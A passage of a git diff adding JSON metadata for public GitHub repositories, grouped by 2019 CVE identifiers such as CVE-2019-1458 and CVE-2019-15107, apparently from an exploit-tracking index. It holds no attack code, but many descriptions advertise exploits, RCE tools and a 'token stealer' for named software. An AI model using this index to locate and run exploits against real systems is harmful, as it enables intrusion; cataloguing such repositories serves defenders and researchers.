"html_url": "https:\/\/github.com\/LeadroyaL\/cve-2019-14540-exploit", + "description": "CVE-2019-14540 Exploit", + "fork": false, + "created_at": "2019-08-21T03:19:19Z", + "updated_at": "2024-11-12T04:01:24Z", + "pushed_at": "2019-08-21T03:59:02Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1458.json b/2019/CVE-2019-1458.json new file mode 100644 index 0000000000..a3d1fa4d5b --- /dev/null +++ b/2019/CVE-2019-1458.json @@ -0,0 +1,99 @@ +[ + { + "id": 244704461, + "name": "cve-2019-1458_POC", + "full_name": "piotrflorczyk\/cve-2019-1458_POC", + "owner": { + "login": "piotrflorczyk", + "id": 7830144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7830144?v=4", + "html_url": "https:\/\/github.com\/piotrflorczyk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/piotrflorczyk\/cve-2019-1458_POC", + "description": "POC for cve-2019-1458", + "fork": false, + "created_at": "2020-03-03T17:55:07Z", + "updated_at": "2024-09-06T03:26:40Z", + "pushed_at": "2022-01-17T19:45:41Z", + "stargazers_count": 172, + "watchers_count": 172, + "has_discussions": false, + "forks_count": 54, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 54, + "watchers": 172, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 246515470, + "name": "CVE-2019-1458", + "full_name": "rip1s\/CVE-2019-1458", + "owner": { + "login": "rip1s", + "id": 12728984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12728984?v=4", + "html_url": "https:\/\/github.com\/rip1s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rip1s\/CVE-2019-1458", + "description": "CVE-2019-1458 Windows LPE Exploit", + "fork": false, + "created_at": "2020-03-11T08:30:14Z", + "updated_at": "2024-10-29T15:30:53Z", + "pushed_at": "2020-03-11T09:59:01Z", + "stargazers_count": 135, + "watchers_count": 135, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-1458", + "exploit", + "lpe" + ], + "visibility": "public", + "forks": 39, + "watchers": 135, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 340239658, + "name": "CVE-2019-1458", + "full_name": "Eternit7\/CVE-2019-1458", + "owner": { + "login": "Eternit7", + "id": 30485227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30485227?v=4", + "html_url": "https:\/\/github.com\/Eternit7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eternit7\/CVE-2019-1458", + "description": null, + "fork": false, + "created_at": "2021-02-19T02:44:27Z", + "updated_at": "2021-02-19T02:44:27Z", + "pushed_at": "2021-02-19T02:44:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14615.json b/2019/CVE-2019-14615.json new file mode 100644 index 0000000000..6b2a3098c4 --- /dev/null +++ b/2019/CVE-2019-14615.json @@ -0,0 +1,39 @@ +[ + { + "id": 234703892, + "name": "iGPU-Leak", + "full_name": "HE-Wenjian\/iGPU-Leak", + "owner": { + "login": "HE-Wenjian", + "id": 42413103, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42413103?v=4", + "html_url": "https:\/\/github.com\/HE-Wenjian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HE-Wenjian\/iGPU-Leak", + "description": "[CVE-2019-14615] iGPU Leak: An Information Leakage Vulnerability on Intel Integrated GPU", + "fork": false, + "created_at": "2020-01-18T08:23:46Z", + "updated_at": "2024-09-26T09:49:18Z", + "pushed_at": "2020-04-06T09:01:07Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "gpu", + "intel", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 12, + "watchers": 55, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14678.json b/2019/CVE-2019-14678.json new file mode 100644 index 0000000000..24efb60201 --- /dev/null +++ b/2019/CVE-2019-14678.json @@ -0,0 +1,39 @@ +[ + { + "id": 771051017, + "name": "CVE-2019-14678", + "full_name": "mbadanoiu\/CVE-2019-14678", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2019-14678", + "description": "CVE-2019-14678: XML External Entity in SAS XML Mapper", + "fork": false, + "created_at": "2024-03-12T15:49:09Z", + "updated_at": "2024-03-12T16:05:19Z", + "pushed_at": "2024-03-12T16:02:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2019-14678", + "cves", + "xxe" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14745.json b/2019/CVE-2019-14745.json new file mode 100644 index 0000000000..1ee95135e5 --- /dev/null +++ b/2019/CVE-2019-14745.json @@ -0,0 +1,33 @@ +[ + { + "id": 219609133, + "name": "CVE-2019-14745", + "full_name": "xooxo\/CVE-2019-14745", + "owner": { + "login": "xooxo", + "id": 9900851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9900851?v=4", + "html_url": "https:\/\/github.com\/xooxo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xooxo\/CVE-2019-14745", + "description": "weaponized radare2 vulnerability found by @CaptnBanana and blenk92", + "fork": false, + "created_at": "2019-11-04T22:31:27Z", + "updated_at": "2024-08-12T19:54:33Z", + "pushed_at": "2019-11-04T22:46:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14751.json b/2019/CVE-2019-14751.json new file mode 100644 index 0000000000..32d5601635 --- /dev/null +++ b/2019/CVE-2019-14751.json @@ -0,0 +1,33 @@ +[ + { + "id": 201508767, + "name": "CVE-2019-14751_PoC", + "full_name": "mssalvatore\/CVE-2019-14751_PoC", + "owner": { + "login": "mssalvatore", + "id": 19957806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19957806?v=4", + "html_url": "https:\/\/github.com\/mssalvatore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mssalvatore\/CVE-2019-14751_PoC", + "description": "A Proof of Concept for CVE-2019-14751", + "fork": false, + "created_at": "2019-08-09T16:56:54Z", + "updated_at": "2024-08-12T19:51:50Z", + "pushed_at": "2019-08-20T13:02:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1476.json b/2019/CVE-2019-1476.json new file mode 100644 index 0000000000..e677b1686e --- /dev/null +++ b/2019/CVE-2019-1476.json @@ -0,0 +1,39 @@ +[ + { + "id": 226188349, + "name": "CVE-2019-1476", + "full_name": "sgabe\/CVE-2019-1476", + "owner": { + "login": "sgabe", + "id": 5206619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206619?v=4", + "html_url": "https:\/\/github.com\/sgabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgabe\/CVE-2019-1476", + "description": "AppXSvc Arbitrary File Overwrite DoS", + "fork": false, + "created_at": "2019-12-05T21:00:16Z", + "updated_at": "2024-08-12T19:55:28Z", + "pushed_at": "2019-12-10T18:12:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "dos-attack", + "exploit", + "proof-of-concept", + "vulnerability", + "windows10" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14830.json b/2019/CVE-2019-14830.json new file mode 100644 index 0000000000..3d28b2aa14 --- /dev/null +++ b/2019/CVE-2019-14830.json @@ -0,0 +1,33 @@ +[ + { + "id": 209007546, + "name": "moodle-token-stealer", + "full_name": "Fr3d-\/moodle-token-stealer", + "owner": { + "login": "Fr3d-", + "id": 6999865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6999865?v=4", + "html_url": "https:\/\/github.com\/Fr3d-", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fr3d-\/moodle-token-stealer", + "description": "CVE-2019-14830", + "fork": false, + "created_at": "2019-09-17T09:04:41Z", + "updated_at": "2024-08-12T19:53:06Z", + "pushed_at": "2019-09-17T09:05:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14900.json b/2019/CVE-2019-14900.json new file mode 100644 index 0000000000..fa81fcfa1c --- /dev/null +++ b/2019/CVE-2019-14900.json @@ -0,0 +1,33 @@ +[ + { + "id": 327314262, + "name": "hibernate-orm", + "full_name": "shanika04\/hibernate-orm", + "owner": { + "login": "shanika04", + "id": 73774345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4", + "html_url": "https:\/\/github.com\/shanika04", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanika04\/hibernate-orm", + "description": "CVE-2019-14900", + "fork": false, + "created_at": "2021-01-06T13:06:45Z", + "updated_at": "2021-01-06T13:21:13Z", + "pushed_at": "2021-01-06T13:20:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14912.json b/2019/CVE-2019-14912.json new file mode 100644 index 0000000000..c26ed11f9f --- /dev/null +++ b/2019/CVE-2019-14912.json @@ -0,0 +1,33 @@ +[ + { + "id": 208986817, + "name": "adaPwn", + "full_name": "Wocanilo\/adaPwn", + "owner": { + "login": "Wocanilo", + "id": 25706428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25706428?v=4", + "html_url": "https:\/\/github.com\/Wocanilo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wocanilo\/adaPwn", + "description": "CVE-2019-14912 PoC", + "fork": false, + "created_at": "2019-09-17T07:24:23Z", + "updated_at": "2019-09-19T07:50:59Z", + "pushed_at": "2019-09-17T07:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14974.json b/2019/CVE-2019-14974.json new file mode 100644 index 0000000000..cdda5ef5d6 --- /dev/null +++ b/2019/CVE-2019-14974.json @@ -0,0 +1,33 @@ +[ + { + "id": 811451797, + "name": "CVE-2019-14974-bypass", + "full_name": "conan-sudo\/CVE-2019-14974-bypass", + "owner": { + "login": "conan-sudo", + "id": 171960622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171960622?v=4", + "html_url": "https:\/\/github.com\/conan-sudo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/conan-sudo\/CVE-2019-14974-bypass", + "description": null, + "fork": false, + "created_at": "2024-06-06T16:11:05Z", + "updated_at": "2024-06-08T10:20:00Z", + "pushed_at": "2024-06-06T16:12:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15029.json b/2019/CVE-2019-15029.json new file mode 100644 index 0000000000..d8a9607897 --- /dev/null +++ b/2019/CVE-2019-15029.json @@ -0,0 +1,33 @@ +[ + { + "id": 204203015, + "name": "CVE-2019-15029", + "full_name": "mhaskar\/CVE-2019-15029", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2019-15029", + "description": "The official exploit code for FusionPBX v4.4.8 Remote Code Execution CVE-2019-15029", + "fork": false, + "created_at": "2019-08-24T19:28:36Z", + "updated_at": "2024-08-12T19:52:19Z", + "pushed_at": "2019-09-23T13:39:09Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15043.json b/2019/CVE-2019-15043.json new file mode 100644 index 0000000000..d1ceb2bd72 --- /dev/null +++ b/2019/CVE-2019-15043.json @@ -0,0 +1,33 @@ +[ + { + "id": 284342041, + "name": "CVE-2019-15043", + "full_name": "h0ffayyy\/CVE-2019-15043", + "owner": { + "login": "h0ffayyy", + "id": 6510183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6510183?v=4", + "html_url": "https:\/\/github.com\/h0ffayyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h0ffayyy\/CVE-2019-15043", + "description": "POC scanner for the Grafana vulnerability CVE-2019-15043", + "fork": false, + "created_at": "2020-08-01T21:31:46Z", + "updated_at": "2024-03-23T10:55:23Z", + "pushed_at": "2022-12-08T11:19:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15053.json b/2019/CVE-2019-15053.json new file mode 100644 index 0000000000..d74ec5bc78 --- /dev/null +++ b/2019/CVE-2019-15053.json @@ -0,0 +1,40 @@ +[ + { + "id": 202405759, + "name": "CVE-2019-15053", + "full_name": "l0nax\/CVE-2019-15053", + "owner": { + "login": "l0nax", + "id": 29659953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29659953?v=4", + "html_url": "https:\/\/github.com\/l0nax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0nax\/CVE-2019-15053", + "description": "(FAB-2019-00156) Vulnerability discoverd by me CVE-2019-15053 ", + "fork": false, + "created_at": "2019-08-14T18:35:36Z", + "updated_at": "2024-08-12T19:51:59Z", + "pushed_at": "2019-10-04T09:15:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-15053", + "exploit", + "poc", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15107.json b/2019/CVE-2019-15107.json new file mode 100644 index 0000000000..bba90705ae --- /dev/null +++ b/2019/CVE-2019-15107.json @@ -0,0 +1,1051 @@ +[ + { + "id": 203123412, + "name": "CVE-2019-15107", + "full_name": "jas502n\/CVE-2019-15107", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-15107", + "description": "CVE-2019-15107 Webmin RCE (unauthorized)", + "fork": false, + "created_at": "2019-08-19T07:43:16Z", + "updated_at": "2024-08-12T19:52:07Z", + "pushed_at": "2019-09-02T16:06:19Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 62, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 203752840, + "name": "webmin_docker_and_exp", + "full_name": "HACHp1\/webmin_docker_and_exp", + "owner": { + "login": "HACHp1", + "id": 25722416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25722416?v=4", + "html_url": "https:\/\/github.com\/HACHp1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HACHp1\/webmin_docker_and_exp", + "description": "Dockerfiles for CVE-2019-15107(webmin RCE) recurrence including v1.890 and v1.920 with Exp for each version.", + "fork": false, + "created_at": "2019-08-22T08:48:07Z", + "updated_at": "2024-08-12T19:52:14Z", + "pushed_at": "2019-08-22T08:58:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 203787157, + "name": "CVE-2019-15107", + "full_name": "ketlerd\/CVE-2019-15107", + "owner": { + "login": "ketlerd", + "id": 4441136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4441136?v=4", + "html_url": "https:\/\/github.com\/ketlerd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ketlerd\/CVE-2019-15107", + "description": "Implementation of CVE-2019-15107 exploit in python", + "fork": false, + "created_at": "2019-08-22T12:07:16Z", + "updated_at": "2024-08-12T19:52:15Z", + "pushed_at": "2019-08-24T01:37:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 203983183, + "name": "CVE-2019-15107", + "full_name": "AdministratorGithub\/CVE-2019-15107", + "owner": { + "login": "AdministratorGithub", + "id": 19834937, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19834937?v=4", + "html_url": "https:\/\/github.com\/AdministratorGithub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdministratorGithub\/CVE-2019-15107", + "description": "CVE-2019-15107 webmin python3", + "fork": false, + "created_at": "2019-08-23T11:10:01Z", + "updated_at": "2024-08-12T19:52:17Z", + "pushed_at": "2019-08-23T11:11:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 210371345, + "name": "Make-and-Break", + "full_name": "Rayferrufino\/Make-and-Break", + "owner": { + "login": "Rayferrufino", + "id": 52383730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52383730?v=4", + "html_url": "https:\/\/github.com\/Rayferrufino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rayferrufino\/Make-and-Break", + "description": "Built a custom Virtual Machine, running Ubuntu 18.04.1 and Webmin 1.810. Using CVE-2019-15107 to exploit a backdoor in the Linux machine", + "fork": false, + "created_at": "2019-09-23T14:07:03Z", + "updated_at": "2024-08-12T19:53:16Z", + "pushed_at": "2019-09-26T03:33:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 217217171, + "name": "WebminRCE-EXP-CVE-2019-15107-", + "full_name": "AleWong\/WebminRCE-EXP-CVE-2019-15107-", + "owner": { + "login": "AleWong", + "id": 13904980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13904980?v=4", + "html_url": "https:\/\/github.com\/AleWong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AleWong\/WebminRCE-EXP-CVE-2019-15107-", + "description": "Remote Code Execution Vulnerability in Webmin", + "fork": false, + "created_at": "2019-10-24T05:19:20Z", + "updated_at": "2024-08-12T19:54:11Z", + "pushed_at": "2019-11-01T07:16:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 228190849, + "name": "CVE-2019-15107", + "full_name": "ianxtianxt\/CVE-2019-15107", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-15107", + "description": null, + "fork": false, + "created_at": "2019-12-15T13:42:28Z", + "updated_at": "2024-08-12T19:55:44Z", + "pushed_at": "2019-12-15T13:42:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 230108996, + "name": "webminex", + "full_name": "hannob\/webminex", + "owner": { + "login": "hannob", + "id": 990588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/990588?v=4", + "html_url": "https:\/\/github.com\/hannob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hannob\/webminex", + "description": "poc exploit for webmin backdoor (CVE-2019-15107 and CVE-2019-15231)", + "fork": false, + "created_at": "2019-12-25T13:47:02Z", + "updated_at": "2024-08-12T19:56:01Z", + "pushed_at": "2019-12-25T13:48:27Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 230738228, + "name": "webmin_CVE-2019-15107", + "full_name": "ChakoMoonFish\/webmin_CVE-2019-15107", + "owner": { + "login": "ChakoMoonFish", + "id": 5085275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5085275?v=4", + "html_url": "https:\/\/github.com\/ChakoMoonFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChakoMoonFish\/webmin_CVE-2019-15107", + "description": "webmin_CVE-2019-15107", + "fork": false, + "created_at": "2019-12-29T11:02:35Z", + "updated_at": "2024-08-12T19:56:07Z", + "pushed_at": "2019-12-29T11:03:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 273768106, + "name": "Modified-CVE-2019-15107", + "full_name": "cdedmondson\/Modified-CVE-2019-15107", + "owner": { + "login": "cdedmondson", + "id": 42309690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42309690?v=4", + "html_url": "https:\/\/github.com\/cdedmondson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cdedmondson\/Modified-CVE-2019-15107", + "description": null, + "fork": false, + "created_at": "2020-06-20T19:03:03Z", + "updated_at": "2021-02-13T20:33:41Z", + "pushed_at": "2021-02-13T20:19:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 286020197, + "name": "CVE-2019-15107", + "full_name": "ruthvikvegunta\/CVE-2019-15107", + "owner": { + "login": "ruthvikvegunta", + "id": 49064045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49064045?v=4", + "html_url": "https:\/\/github.com\/ruthvikvegunta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruthvikvegunta\/CVE-2019-15107", + "description": "Webmin <=1.920 RCE", + "fork": false, + "created_at": "2020-08-08T10:17:03Z", + "updated_at": "2024-09-18T05:30:47Z", + "pushed_at": "2020-08-12T08:36:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "hacking", + "python", + "rce", + "webmin" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 295068653, + "name": "Webmin_1.890-POC", + "full_name": "n0obit4\/Webmin_1.890-POC", + "owner": { + "login": "n0obit4", + "id": 41012866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41012866?v=4", + "html_url": "https:\/\/github.com\/n0obit4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0obit4\/Webmin_1.890-POC", + "description": "CVE-2019-15107 exploit", + "fork": false, + "created_at": "2020-09-13T03:11:29Z", + "updated_at": "2024-11-06T00:41:10Z", + "pushed_at": "2020-11-19T22:32:11Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-15107", + "exploit", + "webmin" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 304359635, + "name": "Webmin_CVE-2019-15107", + "full_name": "squid22\/Webmin_CVE-2019-15107", + "owner": { + "login": "squid22", + "id": 54685018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54685018?v=4", + "html_url": "https:\/\/github.com\/squid22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/squid22\/Webmin_CVE-2019-15107", + "description": "CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920", + "fork": false, + "created_at": "2020-10-15T14:53:48Z", + "updated_at": "2024-11-21T08:14:28Z", + "pushed_at": "2020-10-15T15:10:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 311473237, + "name": "CVE-2019-15107", + "full_name": "MuirlandOracle\/CVE-2019-15107", + "owner": { + "login": "MuirlandOracle", + "id": 58998623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58998623?v=4", + "html_url": "https:\/\/github.com\/MuirlandOracle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuirlandOracle\/CVE-2019-15107", + "description": null, + "fork": false, + "created_at": "2020-11-09T21:46:57Z", + "updated_at": "2024-11-16T19:44:32Z", + "pushed_at": "2024-06-01T15:20:14Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 318241258, + "name": "CVE-2019-15107", + "full_name": "diegojuan\/CVE-2019-15107", + "owner": { + "login": "diegojuan", + "id": 4934646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4934646?v=4", + "html_url": "https:\/\/github.com\/diegojuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegojuan\/CVE-2019-15107", + "description": null, + "fork": false, + "created_at": "2020-12-03T15:43:39Z", + "updated_at": "2020-12-03T15:53:03Z", + "pushed_at": "2020-12-03T15:53:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 382448618, + "name": "CVE-2019-15107", + "full_name": "whokilleddb\/CVE-2019-15107", + "owner": { + "login": "whokilleddb", + "id": 56482137, + "avatar_url": 